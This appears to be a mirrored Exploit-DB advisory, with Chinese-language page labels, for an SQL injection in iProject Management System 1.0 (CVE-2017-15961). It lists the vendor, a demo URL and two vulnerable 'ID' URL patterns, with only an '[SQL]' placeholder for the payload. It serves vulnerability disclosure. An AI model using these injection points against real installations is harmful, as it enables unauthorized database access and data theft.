iProject Management System 1.0 – ‘ID’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-10-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43098/
  • # # # # # 
    # Exploit Title: iProject Management System 1.0 - SQL Injection
    # Dork: N/A
    # Date: 30.10.2017
    # Vendor Homepage: http://ikodes.com/
    # Software Link: https://codecanyon.net/item/iproject-management-system/20483358
    # Demo: http://project.ikodes.com/ikpms/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: CVE-2017-15961
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an users to inject sql commands....
    # 
    # Proof of Concept: 
    # 
    # http://localhost/[PATH]/index.php?cmd=agent&mod=true&ID=[SQL]
    # http://localhost/[PATH]/index.php?cmd=client_master&mod=true&ID=[SQL]
    # 
    # Etc..
    # # # # #